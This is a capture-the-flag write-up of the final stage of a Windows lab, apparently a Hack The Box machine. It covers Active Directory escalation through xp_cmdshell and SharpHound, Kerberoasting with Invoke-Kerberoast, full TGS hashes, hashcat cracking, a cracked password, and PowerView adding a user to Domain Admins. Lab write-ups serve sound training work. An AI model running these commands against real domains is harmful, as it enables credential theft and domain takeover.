30-p00ned
I was having trouble to download sharphound.exe from xp_cmdshell so I,
Downloaded sharphound.exe as administrator user from winrm and gave permissions to all user to read execute so I can execute bloodhound as a domain user.
icacls C:/windows/temp/SharpHound.exe /grant:r "Users:(RX)"
SQL (ctflover dbo@POO_PUBLIC)> xp_cmdshell C:\windows\temp\SharpHound.exe -c all --OutputDirectory
C:\windows\temp
Bloodhound results
Shortest path from kerberoastable user.
The p00_adm user being a member of help desk has GenericAll privileges on the Domain Admins group. This means that we can add any user to Domain Admins if we have p00_adm credentials.
I ll use kerberoasting to get hash
I uploaded invoke-kerberoast.ps1 file to the target system using evil-winrm https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerberoast.ps1
SQL (ctflover dbo@POO_PUBLIC)> xp_cmdshell powershell -c import-module c:\programdata\invoke-kerberoast.ps1; invoke-kerberoast -outputformat hashcat
output -------------------------------------------------------------------------------- NULL
NULL
TicketByteHexStream :
Hash : $krb5tgs$23$*p00_hr$intranet.poo$HR_peoplesoft/intranet.poo:1433*$D1480EFA5BDD4B210E74CBDC43C35E
86$7B8F30DD38B4BDB7C0F6F2E9DF2F8C423165B813DB3E3129CFDD4EBE18A67C423270CBC9A0F30A2D954A972B6BFCE
F4370D8D2101163DA3A769A933F36E0BF544DC438B5390AD0705D05D997F16CFCDE88DDE7B182D8F59FE5FD7B81EB9A0
8DCCE0DFBB8799B77A9D02329ADECAE24A9D207955C8E3F4208B08F7E4DC9EEBA7D84E7A63AE1AAF86A6E17FCE972DD1
BEC11226C9FDFA62A3B81D3A90D5B7CFD9D8A1212939D70A3F633A506051C6D07388B608263F74CEEB4048760E05500A
B6EE947C0924AD56E8A442D0B6557627EADF19B3FFB059319C7CCE9EA03D08A82376A007AD3460862F20C7327A541812
DA695DEC1735508B726BF85AA9A95BD92925FE3F98FE3E9228598137294F606B5944BF563D669595C0593210413A8876
DB34AED573E61982DF0374E0533BCC14E89387090D3D0F490A7469067A6CF7F67795FE558275BFE2174C95D045007098
B2D69E93FAF8AF7EFF6F5579F2E07A5F20CD77EB2B57A6D6397068C0D61760D2C479162DC8D0D367BD0773F5436F571C
ECD6B06A97F5CBF8A67E85B4FCF9A4FE1E6432D95279B8992F8467951099C16983A80F88821764F969F42E091C77489C
A5251F67E993C12DF904787EA63D51F073793E7E2BC118066D34BA0F8DD776B163B5D0F353F08AE147A67A235884B017
019FA597A80DE37CE0B474738DC2523DE7D085AA10025662ACEC5DD5D7DEE35DB992050E3F3195A1F5DA8017F99D2782
FF8EBAF59B116F1AB86326CDE150FF6029FD385142AE4DE72F8851588EAC8712E442554178D83DBDBD1C517EC432054C
FF8A960AE4DBAE7F51B289ADD98132563F5B8483F808C5F15788EEF5A2FA48993F44F24B77BBC46F9EDA2A6F37CB537E
E668CE3C227A1C093980E0EE66B3877401916BC4CB2CC348E7999CAEFBB0ABC1C43C04487706C5A70FBEEC8212F9C23E
8A2439044108E65CBFF54A72DD115F7198CD298199DF8CF5A360368E787FC80085D6FB5043438ED9F9B5557D6DA2C920
FCE77B3650C6A5390EBCE1179F734D468C1AB4D3679E593FAB343BE86A750DA5913FB4191625A12A55C2ECD3A9F85D2D
691B4CF51FC7E4E718DD712DE8F00312C973ADDA2836A0FC2E3D308D7C31146519C339ADB3F22282A04D13191F3B9416
52CA7C3A7DAC402979470E8CC421D1757A46C14027E0A0FFDA1C838365C965A6895F8D38FA449A058FE81545E6668EB8
AC7144D0B31B69FACDE97953D777658B000ADC1931F4D22838B4A6EF007FE3246A0F6A848386EA7F3B245151B1FA7A19
09B40725F923A7AF675CA12D3B2A90FD85CD20470E35325AAAAD43BF4FF638DBAFC58FE6724EC8544DB115D488A86FB1
A4E57D8495D6CF71FD6DF788AAE7344779C2765609602D9D79801A5D19FFAAB4F1E64D7CA2B132441AB9E7941D0E9E3F
28292376F167C89140BC8C4B72386912C772BFA4445572F28F6F485C5F74B68C1C237CDCC3FC7C688866068F613A0
SamAccountName : p00_hr
DistinguishedName : CN=p00_hr,CN=Users,DC=intranet,DC=poo
ServicePrincipalName : HR_peoplesoft/intranet.poo:1433
NULL
TicketByteHexStream :
Hash : $krb5tgs$23$*p00_adm$intranet.poo$cyber_audit/intranet.poo:443*$3385AADE3C46663245ACD404C3C112BA
$D9B22A406EE35D62A75BB61CBC821DA9AFFC8ADB60D81D672C29A765BAA1F6F589C9AB89A5B8731C6764DFEB1778676
D3330FDBA15C32CF2F9BED94EB365B97B05F039F56F3BE6A0009C22834807FDED5F6B08CDC97DA626E13E96620C404FB
2099A8F7D6B7CD0AAA43EDC4EB287E19CE99B03315172D094E305E81A69B63E72BB435E5EAB7F854117B167088E7DA2E
9FA08EE123C6AFD6A5D572AEC221A5AC94AF56A2902F12BD18299E8872EC756D835D5B38F3CB04F0C9470D65C3AA7BC5
C2D699DCD1985313B8B249877CCDFD9B28BF476EFEBF8CF74AAD4E67A6B9799B9A6248775E18ACCD1B8D46264DF91265
967C93026743F71107797F9F1CF3084E32C952410CCB2A9A5CF2B5717C88F98E21A82E5411D2217020704F0247E55B02
EE03F4E913DB93D372AAEA160A50DF79E31F02543A24228372D942DFED8F48221600F5CCF72E5FA7630AEE7F19E2FCAC
DEE45974206085F82E9E0B5CE423E88ADBE133121A59A10B9C66E7BA43C8A9510B22B869139A31ABF28635F596388B46
3FEDC5819678C6659FE6F25D59227F6C26C0D6B5BAF8C3E32D21A028B4D5CF100040321AE52949098BAE6DF68478D342
1073D53EE65CCE0A2B4F702FA1EB6FBDC714771E82C4923FC14585FE081A1EAD12370756D1AF5428E47AAEEDFAADF180
D95190A904D60D5B88B22DF3FC03AEB4950869A60B9E9F3DC298902B9B3736487183E9BAB5B598A619A25C2AF7488676
667D48A8346C39C3BE0D364F239400ADE97986B373D32ABB487C693FCF5D814735B63CAEE5838A04B1B6EACF240C95F0
924CFEBA8A58B755F74C364678BE790F082AE59E0A1B884753679633E2EF510B7752D64B2406440480975015F2DB7C6E
669DBE78F3AD783A044CC07812A1E9F1C3C2C9C5310AE781B87CD69E29BDECC8095347322C7EC5F245D265F2E6A032E8
C66FD1A8367B39A5669F4F4F16E05A3E85BE8B2A060102343362901B1D48DB4A27D4AA5F259A71A8D29EE8DACE65D45C
77E92CFD696801EFE39B4D2C1F9E1A5D473047E599D3643EB67C8E13E3A53E5A8E2CBB73452BA5B421F91B81DC88E4BA
6CAB76FFE11FD622F02AE9E0CB2A028F8B9FA1A66D4BFC4919492A56730F9BB0F2D057EE918AEF0363D536B5DBDA7ECC
F2AA6219F4403378C78977FCBD2D7C6481D9CC9CBF6EC4BD29816CB15BBA93ED83E7587DFE3FEFE7AF1B2CCA48A900D3
84987BEFBC65541509421EDD336A703A455502E6F93B9F8FEEE5928E5D64771BC47DDFCB95F68AF9A0889E68367770D6
2D58106ED23A7705192DC8AD8A789630ED67A20555862072F5755E91BA398DD73CD01FDFBC2A047EB514E5DBDDAF93B9
69C3EA15BAA45F0B0E3C5F6A4A384DFD6B11D2431C6083F5CC3A2672684A4BBF9BBFD1896B11F1E89597C3671BFD2355
1A73381B2BD6A32DE01D5504140CDF7E9F4AB2722838344918F0E42432DDF277CAE2CD7F0DEB85E8A99AA3A0254
SamAccountName : p00_adm
DistinguishedName : CN=p00_adm,CN=Users,DC=intranet,DC=poo
ServicePrincipalName : cyber_audit/intranet.poo:443
NULL
NULL
NULL
I removed extra spaces and new lines from the hash and then tried to break it with hashcat.
`hashcat hash /usr/share/seclists/Passwords/Keyboard-Combinations.txt
Adding Poo_adm to domain admins.
If you have not turned off the antivirus you ll have problem
*Evil-WinRM* PS C:\windows\temp> Import-Module ./Powerview.ps1
*Evil-WinRM* PS C:\windows\temp> $pass = ConvertTo-SecureString 'ZQ!5t4r' -AsPlainText -Force
*Evil-WinRM* PS C:\windows\temp> $cred = New-Object System.Management.Automation.PSCredential('intranet.poo\p00_adm', $pass)
*Evil-WinRM* PS C:\windows\temp> Add-DomainGroupMember -Identity 'Domain Admins' -Members 'p00_adm' -Credential $cred
Flag...
Now Poo_adm is domain admin so it can access C$ share on dc
*Evil-WinRM* PS C:\windows\temp> net use \\DC.intranet.poo\c$ /u:intranet.poo\p00_adm 'ZQ!5t4r'
The command completed successfully.
*Evil-WinRM* PS C:\windows\temp> type \\DC.intranet.poo\c$\users\mr3ks\desktop\flag.txt
POO{1196ef8bc523f084ad1732a3...}